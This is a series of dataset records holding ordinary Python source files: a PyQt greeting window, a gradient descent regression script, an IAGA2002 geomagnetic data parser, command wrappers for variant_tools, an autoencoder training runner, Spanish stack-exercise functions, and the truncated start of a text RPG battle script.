self.layout.addWidget(self.submit_button)\n \n\n self.initial_widget = QWidget()\n self.initial_widget.setLayout(self.layout)\n\n self.stacked_layout.addWidget(self.initial_widget)\n \n #connection\n self.submit_button.clicked.connect(self.switch_layout)\n\n def create_hello_layout(self):\n self.label = QLabel()\n self.back_button = QPushButton(\"Back\")\n \n\n self.hello_layout = QVBoxLayout()\n\n self.hello_layout.addWidget(self.label)\n self.hello_layout.addWidget(self.back_button)\n\n self.hello_widget = QWidget()\n self.hello_widget.setLayout(self.hello_layout)\n self.stacked_layout.addWidget(self.hello_widget)\n\n self.back_button.clicked.connect(self.switch_back)\n\n def switch_layout(self):\n self.stacked_layout.setCurrentIndex(1)\n name = self.text_box.text()\n self.label.setText(\"Hello {0}!\".format(name))\n\n def switch_back(self):\n self.stacked_layout.setCurrentIndex(0)\n self.text_box.setText(str(\"\"))#set text_box back to nothing\n \nif __name__ == \"__main__\":\n application = QApplication(sys.argv)\n window = MainWindow()\n window.show()\n window.raise_()\n application.exec_()\n","sub_path":"window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"648476891","text":"import numpy as np\n\ndef cost_calc(x_train,y_train,m,c):\n cost=0\n cost=(y_train-((x_train*m)+c))**2\n # for i in range(0,len(x_train)):\n # cost=cost+((1/len(x_train))*(y_train[i]-((m*x_train)+c))**2)\n cost=cost/len(x_train)\n return cost.sum()\n\n\ndef step_grad(x_train,y_train,learning_rate,m,c):\n m_slope = 0\n c_slope = 0\n # for i in range(0,len(x_train)):\n # m_slope = m_slope - ((-2 / (len(x_train))) * (y_train[i]-m*x_train[i]-c))*x_train[i]\n # c_slope = c_slope - ((-2 / (len(x_train))) * (y_train[i] - m * x_train[i] - c))\n m_slope=(-2/len(x_train))*((y_train-((m*x_train)+c))*x_train)\n c_slope = (-2 / len(x_train)) * (y_train - ((m * x_train) + c))\n new_m = m - learning_rate * m_slope.sum()\n new_c = c - learning_rate * c_slope.sum()\n return new_m , new_c\n\n\ndef grad_descent(x_train,y_train,learning_rate,num_iterations):\n m=0\n c=0\n prev_cost=0\n cost=0\n for i in range(num_iterations):\n m,c=step_grad(x_train,y_train,learning_rate,m,c)\n prev_cost = cost\n cost = cost_calc(x_train, y_train, m, c)\n print(\"The cost for m:\",m,\" and c:\",c,\" is:\",cost)\n return m,c,cost\n\n\ndef loading():\n data=np.loadtxt('data.csv',delimiter=\",\")\n # print(data)\n print(data.shape)\n x=data[:,0]\n x=x.reshape(-1,1)\n y=data[:,1]\n y=y.reshape(-1,1)\n print(x.shape,y.shape)\n from sklearn import model_selection\n x_train,x_test,y_train,y_test=model_selection.train_test_split(x,y,test_size=1)\n learning_rate=0.0001\n num_iterations=10\n print(type(x_train))\n m,c,cost=grad_descent(x_train,y_train,learning_rate,num_iterations)\n print(\"Testing Data.............................\")\n m, c ,cost= grad_descent(x_test, y_test, learning_rate, num_iterations)\n\n\nloading()","sub_path":"Supervised_Learning/Regression_Techniques/Multi_Variable_ Regression_and_Gradient-Descent/f-01.py","file_name":"f-01.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"352345111","text":"import sys\nfrom argparse import ArgumentParser, ArgumentDefaultsHelpFormatter\nfrom datetime import datetime, timedelta\nfrom collections import OrderedDict, namedtuple, defaultdict\n\n\nclass Header(namedtuple('Header',\n ['Format',\n 'Source_of_Data',\n 'Station_Name',\n 'IAGA_CODE',\n 'Geodetic_Latitude',\n 'Geodetic_Longitude',\n 'Elevation',\n 'Reported',\n 'Sensor_Orientation',\n 'Digital_Sampling',\n 'Data_Interval_Type',\n 'Data_Type',\n 'Comment'])):\n pass\n\n\nHEADER_TYPES = defaultdict(lambda: str,\n [('Geodetic_Latitude', float),\n ('Geodetic_Longitude', float),\n ('Elevation', float)])\n\n\ndef convert_float(s):\n \"\"\"\n Convert the string data field *s* to a float. If the value is\n 99999 (missing data) or 88888 (not observed), return not a number.\n \"\"\"\n f = float(s)\n if int(f) in [99999, 88888]:\n return float('nan')\n return f\n\n\ndef parse(fname):\n \"\"\"\n Parser the IAGA2002 format file *fname* and return a tuple with a\n :class:`Header` and mapping of date/times to measured values.\n \"\"\"\n with open(fname) as fid:\n # parse header\n header_map = {}\n comment_lines = []\n for line in fid:\n if line[69] != '|' and line.rstrip()[-1] != '|':\n raise RuntimeError('malformed header line in {} ({}) --- expected | but found \"{}\"'.format(fname,\n line,\n line[69]))\n elif line[1] == '#':\n comment_lines += [line[3:69].rstrip()]\n elif line.startswith('DATE'):\n break\n else:\n key = line[:24].strip().replace(' ', '_')\n header_map[key] = HEADER_TYPES[key](line[24:69].strip())\n header_map['Comment'] = '\\n'.join(comment_lines)\n try:\n header = Header(**header_map)\n except TypeError:\n raise RuntimeError('unknown header record found in {}'.format(fname))\n # parse data header record\n fields = line[:69].split()\n if len(fields) != 7:\n raise RuntimeError('malformed data header record in {} ({})'.format(fname,\n line))\n DataRecord = namedtuple('DataRecord', ' '.join(fields[3:]))\n data_map = OrderedDict()\n # parse data records\n for line in fid:\n dt = datetime.strptime(line[:23], '%Y-%m-%d %H:%M:%S.%f')\n data1 = convert_float(line[31:40])\n data2 = convert_float(line[41:50])\n data3 = convert_float(line[51:60])\n data4 = convert_float(line[61:70])\n data_map[dt] = DataRecord(data1,\n data2,\n data3,\n data4)\n return header, data_map\n\n\ndef main(argv=None):\n if argv is None:\n argv = sys.argv\n\n parser = ArgumentParser('Dump a IAGA2002 format file.',\n formatter_class=ArgumentDefaultsHelpFormatter)\n parser.add_argument('iaga2002_fname',\n type=str,\n help='IAGA2002 file name')\n args = parser.parse_args(argv[1:])\n\n header, data_map = parse(args.iaga2002_fname)\n\n for key, value in header._asdict().iteritems():\n print('{} = {}'.format(key.replace(' ', '-'), value))\n for dt, values in data_map.iteritems():\n print('{:%Y-%m-%d %H:%M:%S.%f}: {} {} {} {}'.format(dt,\n values[1],\n values[2],\n values[3],\n values[4]))\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n sys.exit(main())\n","sub_path":"mag/iaga2002.py","file_name":"iaga2002.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"60232753","text":"#!/usr/bin/env python\n# Copyright (c) 2015, Di Zhang \n\nimport os, sys\nimport variant_tools.project as project\nimport variant_tools.importer as importer\nimport variant_tools.exporter as exporter\nimport variant_tools.update as update\nimport variant_tools.variant as variant\nimport variant_tools.compare as compare\nimport variant_tools.association as association\nimport variant_tools.pipeline as pipeline\nimport variant_tools.phenotype as phenotype\nimport variant_tools.annotation as annotation\nfrom time import sleep\n\nclass Args:\n def __init__(self):\n self.verbosity = 1\n self.unknown_args = []\n def Manifest(self):\n for k, v in vars(self).items():\n sys.stderr.write('{}: {}\\n'.format(k, v))\n \nclass Init(Args):\n def __init__(self, Project='test', Build='hg19', Force=False):\n Args.__init__(self)\n self.project = Project\n self.build = Build\n self.force = Force\n self.parent = False\n self.children = False\n \n def Run(self):\n #self.Manifest()\n project.init(self)\n sleep(0) #sleep 3 seconds\n\nclass Import(Args):\n def __init__(self, Input_files=[], Format='', Build='hg19', Sample_name=[], Force=False, Jobs=1):\n Args.__init__(self)\n self.input_files = Input_files\n self.build = Build\n self.format = Format\n self.sample_name = Sample_name\n self.force = Force\n self.jobs = Jobs\n\n def Run(self):\n #self.Manifest()\n importer.importVariants(self)\n sleep(0) #sleep 3 seconds\n\nclass Update(Args):\n def __init__(self, Table='variant', From_file=[], Format='', Sample_name=[], Jobs=1, Set=[], From_stat=[], Samples=[], Genotypes=[], Build='hg19'):\n Args.__init__(self)\n self.table = Table\n self.from_file = From_file\n self.format = Format\n self.jobs = Jobs\n self.sample_name =Sample_name\n self.set = Set\n self.from_stat = From_stat\n self.samples = Samples\n self.genotypes = Genotypes\n self.build= Build\n\n def Run(self):\n #if self.from_file == '' and self.from_stat == []:\n # sys.stderr('Must choose a way to update: From_file or From_stat\\n')\n # return\n #self.Manifest()\n update.update(self)\n sleep(0) #sleep 3 seconds\n\nclass Phenotype(Args):\n def __init__(self, From_file=None, Set=[], From_stat=[], Output=[], Jobs=1, Genotypes=[], Samples=[], Header=None, Delimiter='\\t', Na='NA', Limit=-1):\n Args.__init__(self)\n self.from_file = From_file\n self.output = Output\n self.jobs = Jobs\n self.set = Set\n self.from_stat = From_stat\n self.samples = Samples\n self.genotypes = Genotypes\n self.header = Header\n self.delimiter = Delimiter\n self.na = Na\n self.limit = Limit\n\n def Run(self):\n #if self.from_file == '' and self.from_stat == []:\n # sys.stderr('Must choose a way to update: From_file or From_stat\\n')\n # return\n #self.Manifest()\n phenotype.phenotype(self)\n sleep(0) #sleep 3 seconds\n\nclass Use(Args):\n def __init__(self, Source='', As=None, Linked_by=[], Anno_type=None, Linked_fields=None, Files=[], Rebuild=False, Jobs=1):\n Args.__init__(self)\n self.source = Source\n setattr(self, 'as', As) #hack ...\n self.linked_by = Linked_by\n self.anno_type = Anno_type\n self.linked_fields = Linked_fields\n self.files = Files\n self.rebuild = Rebuild\n self.jobs = Jobs\n\n def Run(self):\n #self.Manifest()\n annotation.use(self)\n sleep(0) #sleep 3 seconds\n \nclass Compare(Args):\n def __init__(self, Tables=[], Union=[], Intersection=[], Difference=[], Expression=[], Mode=None, Samples=[], Count=False, A_diff_B=[], B_diff_A=[], A_and_B=[], A_or_B=[]):\n Args.__init__(self)\n self.tables = Tables\n self.union = Union\n self.intersection = Intersection\n self.difference = Difference\n self.expression = Expression\n self.mode = Mode\n self.samples = Samples\n self.count = Count\n self.A_diff_B = A_diff_B\n self.B_diff_A = B_diff_A\n self.A_and_B = A_and_B\n self.A_or_B = A_or_B\n\n def Run(self):\n #self.Manifest()\n compare.compare(self)\n sleep(0) #sleep 3 seconds\n\nclass Associate(Args):\n def __init__(self, Variants='', Phenotypes=[], Covariates=[], Var_info=[], Geno_info=[], Geno_name='GT', Methods=[], Group_by=[], Samples=[], Genotypes=[], Discard_samples=[], Discard_variants=[], To_db='', Delimiter=None, Force=False, Jobs=1, Unknown_args=[]):\n Args.__init__(self)\n self.variants = Variants\n self.phenotypes = Phenotypes\n self.covariates = Covariates\n self.var_info = Var_info\n self.geno_info = Geno_info\n self.geno_name = Geno_name\n self.methods =Methods\n self.group_by = Group_by\n self.samples = Samples\n self.genotypes = Genotypes\n self.discard_samples = Discard_samples\n self.discard_variants = Discard_variants\n self.to_db = To_db\n self.delimiter = Delimiter\n self.force = Force\n self.jobs = Jobs\n self.unknown_args = Unknown_args\n\n def Run(self):\n #self.Manifest()\n association.associate(self)\n sleep(3) #sleep 3 seconds\n\nclass GeneralOutput(Args):\n def __init__(self, Header=[], Delimiter=None, Na='.', Limit=None, Build='hg19', Group_by=[], All=False, Order_by=[]):\n Args.__init__(self)\n self.header = Header\n self.delimiter = Delimiter\n self.na = Na\n self.limit = Limit\n self.build = Build\n self.group_by = Group_by\n self.all = All\n self.order_by = Order_by\n \nclass Select(GeneralOutput):\n def __init__(self, From_table='', Condition=[], Samples=[], To_table=[], Count=False, Output=[], *args, **kwargs):\n GeneralOutput.__init__(self, *args, **kwargs)\n self.from_table = From_table\n self.condition = Condition\n self.samples = Samples\n self.to_table = To_table\n self.count = Count\n self.output = Output\n\n def Run(self):\n #self.Manifest()\n variant.select(self)\n sleep(0) #sleep 3 seconds\n\nclass Exclude(Select):\n def Run(self):\n #self.Manifest()\n variant.select(self, reverse=True)\n sleep(3) #sleep 3 seconds\n\nclass Output(GeneralOutput):\n def __init__(self, Table='', Fields=[], *args, **kwargs):\n GeneralOutput.__init__(self, *args, **kwargs)\n self.table = Table\n self.fields = Fields\n\n def Run(self):\n #self.Manifest()\n variant.output(self)\n sleep(0) #sleep 3 seconds\n\nclass Export(Args):\n def __init__(self, Table='', Output=None, Samples=[], Format='', Build='hg19', Header=[], Jobs=1):\n Args.__init__(self)\n self.table = Table\n self.filename =False\n self.output = Output\n self.samples = Samples\n self.format = Format\n self.build = Build\n self.header = Header\n self.jobs = Jobs\n\n def Run(self):\n #self.Manifest()\n exporter.export(self)\n sleep(0) #sleep 3 seconds\n\nclass Remove(Args):\n def __init__(self, Type='', Items=[]):\n Args.__init__(self)\n self.type = Type\n self.items = Items\n\n def Run(self):\n #self.Manifest()\n project.remove(self)\n sleep(0) #sleep 3 seconds\n\nclass Execute(Args):\n def __init__(self, Specfile='', Pipelines=[], Input=[], Output=[], Jobs=1, Delimiter='\\t', Extra_args=''):\n Args.__init__(self)\n self.specfile = Specfile\n self.pipelines = Pipelines\n self.input = Input\n self.output = Output\n self.jobs = Jobs\n self.delimiter = Delimiter\n self.unknown_args = Extra_args.split()\n\n def Run(self):\n #self.Manifest()\n pipeline.execute(self)\n sleep(0) #sleep 3 seconds\n\nclass Admin(Args):\n def __init__(self,\n Update_resource='',\n Mirror_repository='',\n Merge_samples=False,\n Rename_samples=[],\n Rename_table=[],\n Describe_table=[],\n Validate_build=False,\n Validate_sex=False,\n Save_snapshot=[],\n Extra_files=[],\n Load_snapshot='',\n Set_runtime_option=[],\n Reset_runtime_option='',\n Record_exe_info=None,\n Partial_md5=None,\n Fasta2crr=None):\n Args.__init__(self)\n self.update_resource = Update_resource\n self.mirror_repository = Mirror_repository\n self.merge_samples = Merge_samples\n self.rename_samples = Rename_samples\n self.rename_table = Rename_table\n self.describe_table = Describe_table\n self.validate_build = Validate_build\n self.validate_sex = Validate_sex\n self.save_snapshot = Save_snapshot\n self.extra_files = Extra_files\n self.load_snapshot = Load_snapshot\n self.set_runtime_option = Set_runtime_option\n self.reset_runtime_option = Reset_runtime_option\n self.record_exe_info = Record_exe_info\n self.partial_md5 = Partial_md5\n self.fasta2crr = Fasta2crr\n\n def Run(self):\n #self.Manifest()\n project.admin(self)\n sleep(3) #sleep 3 seconds\n\nclass Show(Args):\n def __init__(self, Type=\"\", Items=[], Limit=None):\n Args.__init__(self)\n self.type = Type\n self.items = Items\n self.limit = Limit\n\n def Run(self):\n project.show(self)\n sleep(0)\n","sub_path":"src/Command.py","file_name":"Command.py","file_ext":"py","file_size_in_byte":9770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"445517284","text":"from autoencoder_models.DenoisingAutoencoder import MaskingNoiseAutoencoder\n\nimport numpy as np\nimport sklearn.preprocessing as prep\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport matplotlib.pyplot as plt\n\nmnist = input_data.read_data_sets('./data',one_hot=True)\n\ndef standard_scale(X_train,X_test):\n preprocessor = prep.StandardScaler().fit(X_train)\n X_train = preprocessor.transform(X_train)\n X_test = preprocessor.transform(X_test)\n return X_train,X_test\n\ndef get_random_black_from_data(data,batch_size):\n start_index = np.random.randint(0,len(data)-batch_size)\n return data[start_index:(start_index+batch_size)]\n\nX_train,X_text = standard_scale(mnist.train.images,mnist.test.images)\n\nn_samples = int(mnist.train.num_examples)\n\ntrain_epochs = 20\n\nbatch_sizd = 128\n\ndesplay_step = 10\n\ngae = MaskingNoiseAutoencoder(\n n_input=784,\n n_hidden=200,\n transfer_function=tf.nn.softplus,\n optimizer=tf.train.AdamOptimizer(learning_rate=0.001),\n)\n\nfor epoch in range(train_epochs):\n avg_cost = 0.\n total_batch = int(n_samples / batch_sizd)\n\n for i in range(total_batch):\n batch_xs = get_random_black_from_data(X_train, batch_sizd)\n\n cost = gae.partial_fit(batch_xs)\n\n avg_cost += cost / n_samples * batch_sizd\n\n if epoch % desplay_step == 0:\n print(\"Epoch:\", '%d,' % (epoch + 1), \"Cost:\", \"{:.9f}\".format(avg_cost))\n\nprint(\"Total cost: \" + str(gae.calc_total_cost(X_text)))\n\n'''\n\n'''\nplt.imshow(np.reshape(gae.reconstruct(X_text),(-1,28,28))[0])\nplt.show()","sub_path":"AdditiveGaussianNoiseAutoencoderRunner.py","file_name":"AdditiveGaussianNoiseAutoencoderRunner.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"389682160","text":"from TDA_Pila import Pila, apilar, desapilar, pilaint, pilastring, invertir\nfrom TDA_Pila import pila_vacia, pila_llena, tamanio, ordenar_pila\nfrom TDA_Pila import cima, barrido\nimport random\n\nprint('TP3 - PILA')\nprint('')\n\n# Declaraciones para ejercicios\nvec = [5, 3, 2, 1, 6, 9, 0, 8, 7, 4]\n\nPN = Pila()\npilaint(PN)\nprint('Pila de numeros enteros')\nbarrido(PN)\nprint('')\n\nPC = Pila()\npilastring(PC)\nprint('Pila de caracteres')\nbarrido(PC)\nprint('')\n\n\n# EJ 1\ndef ocurrencias(P):\n '''Numero de ocurrencias de un determinado elemento en una pila'''\n c = 0\n busc = 10\n while not pila_vacia(P):\n x = desapilar(P)\n if x == busc:\n c += 1\n print('El numero ' + str(busc) + ' se repite ' + str(c) + ' veces')\n\n\n# EJ 2\ndef impares(P):\n '''Elimina numeros impares de una pila'''\n P2 = Pila()\n while not pila_vacia(P):\n x = desapilar(P)\n if x % 2 == 0:\n apilar(P2, x)\n invertir(P2)\n barrido(P2)\n\n\n# EJ 3\ndef reemplazo(P):\n '''Reemplaza un elemento repetido en una pila por otro dado'''\n P2 = Pila()\n reemplazar = 1999\n busc = 10\n while not pila_vacia(P):\n x = desapilar(P)\n if x == busc:\n x = reemplazar\n apilar(P2, x)\n invertir(P2)\n else:\n apilar(P2, x)\n barrido(P2)\n\n\n# EJ 4\n'''Ejercicio invertir esta en TDA'''\n\n\n# EJ 5\ndef palindromo():\n '''Devuelve True si una palabra es un palindromo'''\n P = Pila()\n cad = 'neuquen'\n print(cad)\n aux = len(cad)\n cad_aux = ''\n for i in range(0, aux):\n c = cad[i]\n apilar(P, c)\n while not pila_vacia(P):\n cad_aux = cad_aux + desapilar(P)\n if cad == cad_aux:\n print(cad_aux)\n print(True)\n else:\n print(cad_aux)\n print(False)\n\n\n# EJ 6\ndef inversa():\n '''Invierte una palabra'''\n P = Pila()\n cad = 'python'\n print(cad)\n aux = len(cad)\n cad_aux = ''\n for i in range(0, aux):\n c = cad[i]\n apilar(P, c)\n while not pila_vacia(P):\n cad_aux = cad_aux + desapilar(P)\n print(cad_aux)\n\n\n# EJ 7\ndef i_esimo(P):\n '''Elimina un i-esimo elemento que esta debajo de la cima'''\n Paux = Pila()\n pos = 5 # posicion en la pila\n if tamanio(P) > pos+1:\n i = 0\n while i < pos:\n x = desapilar(P)\n apilar(Paux, x)\n i += 1\n x = desapilar(P)\n print('elemento eliminado: ' + x)\n while not pila_vacia(Paux):\n x = desapilar(Paux)\n apilar(P, x)\n\n\n# EJ 8\ndef cartas():\n '''Pila de cartas de baraja espaniola,\n se debe incrementar el tamanio de la pila a 48 para este ejercicio'''\n P = Pila()\n Pesp = Pila()\n Pbas = Pila()\n Poro = Pila()\n Pcop = Pila()\n palos = ['Espada', 'Basto', 'Oro', 'Copa']\n for i in range(1, 48):\n num = random.randint(1, 12)\n palo = random.choice(palos)\n apilar(P, [num, palo])\n while not pila_vacia(P):\n x = desapilar(P)\n if x[1] == 'Espada':\n apilar(Pesp, x)\n elif x[1] == 'Basto':\n apilar(Pbas, x)\n elif x[1] == 'Oro':\n apilar(Poro, x)\n elif x[1] == 'Copa':\n apilar(Pcop, x)\n print('Mazo de espada')\n barrido(Pesp)\n print('Mazo de basto')\n barrido(Pbas)\n print('Mazo de oro')\n barrido(Poro)\n print('Mazo de copa')\n barrido(Pcop)\n Pesp = ordenar_pila(Pesp)\n print('Mazo de espada ordenados')\n barrido(Pesp)\n\n\n# EJ 9\ndef factorial(num):\n '''Pila de factoriales de un numero dado'''\n P = Pila()\n for i in range(1, num+1):\n apilar(P, i)\n print('')\n barrido(P)\n resultado = 1\n while not pila_vacia(P):\n resultado *= desapilar(P)\n return resultado\n\n\n# EJ 10\ndef dioses_griegos():\n '''Inserta el nombre de 'Atenea' en una pila de dioses griegos'''\n P = Pila()\n Paux = Pila()\n pos = 2 # posicion en la lista\n dioses = ['Zeus', 'Poseidon', 'Hades', 'Arkantos', 'Apolo', 'Hermes',\n 'Ares', 'Persefone', 'Artemisa']\n for i in range(0, 9):\n apilar(P, dioses[i])\n print('Pila de dioses griegos:')\n barrido(P)\n print('')\n if tamanio(P) > pos+1:\n i = 0\n while i < pos:\n x = desapilar(P)\n apilar(Paux, x)\n i += 1\n x = apilar(P, 'ATENEA')\n while not pila_vacia(Paux):\n apilar(P, desapilar(Paux))\n barrido(P)\n print('Se inserto a la diosa \"Atenea\" en la posicion: ' + str(pos))\n\n\n# EJ 11\ndef vocales(P):\n '''Determina cuantas vocales hay en una pila de caracteres'''\n c = 0\n while not pila_vacia(P):\n x = desapilar(P)\n if x == 'A' or x == 'a' or x == 'E' or x == 'e' or x == 'I' or x == 'i' or x == 'O' or x == 'o' or x == 'U' or x == 'u':\n c += 1\n print('Cantidad de vocales: ' + str(c))\n\n\n# EJ 12\ndef busqueda_sw():\n '''Busqueda personajes de Star Wars'''\n P = Pila()\n Paux = Pila()\n leia = False\n bf = False\n personajes = ['Darth Vader', 'Luke Skywalker', 'Chewbacca', 'Yoda', 'R2D2',\n 'Obi-Wan Keobi', 'Han Solo', 'C3PO', 'Leia Organa',\n 'Jabba el Hutt', 'Boba Fett']\n for i in range(0, 10):\n sw = random.choice(personajes)\n apilar(P, sw)\n print('Pila de personajes:')\n barrido(P)\n print('')\n while not pila_vacia(P):\n x = desapilar(P)\n if x == 'Leia Organa':\n apilar(Paux, x)\n leia = True\n if x == 'Boba Fett':\n apilar(Paux, x)\n bf = True\n while not pila_vacia(Paux):\n apilar(P, desapilar(Paux))\n if leia:\n print('Leia Organa se encuentra en la pila')\n else:\n print('Leia Organa no esta almacenada')\n if bf:\n print('Boba Fett se encuentra en la pila')\n else:\n print('Boba Fett no esta almacenado')\n\n\n# EJ 13\ndef crecientes():\n '''Inserta elementos en una pila de manera creciente'''\n P = Pila()\n Paux = Pila()\n while not pila_llena(P):\n dato = random.randint(1, 50)\n print(str(dato) + ' agregado')\n if not pila_vacia(P): # ingresa cuando hay al menos un elemento en P\n while not pila_vacia(P) and cima(P) >= dato:\n apilar(Paux, desapilar(P))\n apilar(P, dato)\n while not pila_vacia(Paux):\n apilar(P, desapilar(Paux))\n print('')\n barrido(P)\n\n\n# EJ 14\ndef quicksort(vec, pri, ult):\n '''Ordenamiento quicksort'''\n P = Pila()\n apilar(P, [pri, ult])\n datos = []\n while not pila_vacia(P):\n datos = desapilar(P)\n i = datos[0]\n j = datos[1] - 1\n pivot = datos[1]\n while i < j:\n while vec[i] <= vec[pivot] and i < j:\n i += 1\n while vec[j] > vec[pivot] and i < j:\n j -= 1\n if i <= j:\n vec[i], vec[j] = vec[j], vec[i]\n if vec[pivot] < vec[i]:\n vec[pivot], vec[i] = vec[i], vec[pivot]\n if datos[0] < j:\n apilar(P, [datos[0], j])\n if datos[1] > i:\n apilar(P, [i+1, datos[1]])\n\n\n# EJ 15\ndef interseccion_sw():\n '''Obtiene los personajes que aparecieron en el episodio V y VII\n de la saga Star Wars'''\n P5 = Pila()\n P7 = Pila()\n Paux = Pila()\n ep5 = ['Luke Skywalker', 'Lando Calrissian', 'Yoda', 'Chewbacca',\n 'Emperador Palpatine', 'C3PO']\n ep7 = ['Rey', 'Finn', 'Luke Skywalker', 'Kylo Ren', 'Chewbacca',\n 'C3PO']\n for i in range(0, 5):\n apilar(P5, ep5[i])\n apilar(P7, ep7[i])\n print('Episodio V: The empire strikes back')\n barrido(P5)\n print('')\n print('Episodio VII: The force awakens')\n barrido(P7)\n print('')\n while not pila_vacia(P5):\n x = desapilar(P5)\n while not pila_vacia(P7):\n y = desapilar(P7)\n if(x == y):\n print('El personaje ' + str(x) + ' se encuentra en ambos episodios')\n apilar(Paux, y)\n while(not pila_vacia(Paux)):\n y = desapilar(Paux)\n apilar(P7, y)\n\n\n# EJ 16\ndef contador():\n '''Algoritmo que muestra datos de un parrafo, tal como sus vocales,\n consonantes, numeros, espacios en blancos y otros simbolos'''\n PV = Pila()\n PC = Pila()\n PO = Pila()\n parrafo = 'Miedo, ira, agresividad, el lado oscuro ellos s0n. Si algun dia rigen tu vida, para siempre tu destino dominaran.'\n numeros = '0123456789'\n vocales = 'aeiouAEIOU'\n consonantes = 'bcdfghjklmnpqrstvwxyzBCDFGHJKLMNPQRSTVWXYZ'\n for elemento in parrafo:\n if elemento in vocales:\n apilar(PV, elemento)\n elif elemento in consonantes:\n apilar(PC, elemento)\n else:\n apilar(PO, elemento)\n\n # A) B) y D)\n voc, cons, otr, espbl, num = 0, 0, 0, 0, 0\n while not pila_vacia(PV):\n desapilar(PV)\n voc += 1\n while not pila_vacia(PC):\n desapilar(PC)\n cons += 1\n while not pila_vacia(PO):\n x = desapilar(PO)\n otr += 1\n if x == ' ':\n espbl += 1\n elif x in numeros:\n num += 1\n print('Cantidad de vocales: ' + str(voc))\n print('Cantidad de consonantes: ' + str(cons))\n print('Cantidad de otros caracteres: ' + str(otr))\n print('Cantidad de espacios en blanco: ' + str(espbl))\n print('Cantidad de numeros: ' + str(num))\n\n # C)\n total = voc + cons + otr\n print('Porcentaje de vocales: ' + str((voc * 100) / total) + '%')\n print('Porcentaje de consonantes: ' + str((cons * 100) / total) + '%')\n\n # E)\n if voc == otr:\n print('Igual cantidad')\n else:\n print('Cantidades distintas')\n\n # F)\n LetraZ = False\n while not pila_vacia(PC):\n dato = desapilar(PC)\n if dato == 'z':\n LetraZ = True\n if LetraZ:\n print('Existen letras Z en el parrafo')\n else:\n print('No hay letras Z en el parrafo')\n\n\n# EJ 17\ndef piladeobjetos():\n '''Ordena una pila de objetos por su peso'''\n P = Pila()\n objetos = ['monitor', 'teclado', 'raton', 'carpeta',\n 'almohadilla', 'sujetapapeles', 'abrochadora', 'cafetera']\n for i in range(0, len(objetos)):\n pes = random.randint(1, 20)\n apilar(P, [pes, objetos[i]])\n print('Pila de objetos(en kg.)')\n barrido(P)\n print('')\n P = ordenar_pila(P)\n print('Pila de objetos ordenados por peso:')\n barrido(P)\n\n\n# EJ 18\ndef peliculas():\n '''Pila de peliculas y sus datos'''\n P = Pila()\n Paux = Pila()\n c = 0\n titulo = ['Capitan America', 'Relatos Salvajes', 'Bohemian Rhapsody',\n 'Doctor Strange', 'Avengers: Infinity War',\n 'Guardianes de la galaxia']\n estudio = ['Marvel Studios', 'Kramer and Sigman Films', 'GK Films',\n 'Marvel Studios', 'Marvel Studios', 'Marvel Studios']\n anio = ['2016', '2014', '2018', '2016', '2018', '2014']\n for i in range(0, 6):\n title, studio, year = titulo[i], estudio[i], anio[i]\n apilar(P, [title, studio, year])\n print('Peliculas:')\n barrido(P)\n print('')\n while not pila_vacia(P):\n dato = desapilar(P)\n if dato[2] == '2014':\n print(str(dato[0]) + ' fue estrenada en 2014')\n if dato[2] == '2018':\n c += 1\n if dato[1] == 'Marvel Studios' and str(dato[2]) == '2018':\n print(str(dato[0]) + ' fue producida por Marvel en el anio 2018')\n print('Se estrenaron ' + str(c) + ' peliculas en 2018')\n\n\n# EJ 19\n\n\n# ocurrencias(PN)\n# impares(PN)\n# reemplazo(PN)\n# invertir(PN)\n# palindromo()\n# inversa()\n# i_esimo(PC)\n# cartas()\n# factorial(10)\n# dioses_griegos()\n# vocales(PC)\n# busqueda_sw()\n# crecientes()\n# quicksort(vec, 0, len(vec)-1)\n# print(vec)\n# interseccion_sw()\n# contador()\n# piladeobjetos()\n# peliculas()\n","sub_path":"TP3_Pila/Unit_Pila.py","file_name":"Unit_Pila.py","file_ext":"py","file_size_in_byte":11806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"418607726","text":"from classes.game import Person, bcolors\nfrom classes.magic import Spell\nfrom classes.inventory import Item\nimport random\n\nprint(\"\\n\\n\")\n#black magic\nfire = Spell(\"Fire\", 70, 180, \"black\")\nthunder = Spell(\"Thunder\", 15, 140, \"black\")\nblizzard = Spell(\"Blizzard\", 30, 250, \"black\")\ndbeam = Spell(\"Dark Beam\", 100, 3000, \"black\")\nforceflash = Spell(\"Team Attack.\", 170, 4500, \"black\")\n#white magic\ncure = Spell(\"Cure\", 25, 1200, \"white\")\nbandage = Spell(\"Bandage\", 5, 100, \"white\")\nsensubean = Spell(\"Take a Sensu Bean\", 60, 700, \"white\")\n\n#create some items\npotion = Item(\"Potion\", \"potion\", \"Heals 100 HP\", 100)\ndarke = Item(\"Dark Energy\", \"potion\", \"Heals 2000 HP\", 2000)\nsuperpotion = Item(\"Super Potion\", \"potion\", \"Heals 200 HP\", 150)\nelixer = Item(\"Elixer\", \"elixer\", \"Fully restores Hp of one party member\", 99999)\nbagofbeans = Item(\"Bag of Beans\", \"elixer\",\"Heals the Entire Team\", 99999 )\n#items that doo damage\ngerenade = Item(\"Gerenade\", \"attack\", \"Deals 500 HP damage.\", 500)\nteamattack = Item(\"Team Attack\", \"attack\", \"Focus the team into a single attack.\", 4000)\n\n\n\n\nplayer_magic = [fire, thunder, blizzard, dbeam, forceflash, bandage, cure, sensubean]\nplayer_items = [ {\"item\": potion,\"quantity\": 3}, {\"item\": superpotion, \"quantity\":2}, {\"item\": elixer, \"quantity\": 1},\n {\"item\": bagofbeans, \"quantity\": 1}, {\"item\": gerenade, \"quantity\": 3}, {\"item\": teamattack, \"quantity\": 1}]\n\n\n # instntiate people\nplayer1 = Person(\"Valos \", 4000, 150, 120, 35,[fire, thunder, blizzard, cure, sensubean] , [{\"item\": superpotion, \"quantity\":2},{\"item\": gerenade, \"quantity\": 5},])\nplayer2 = 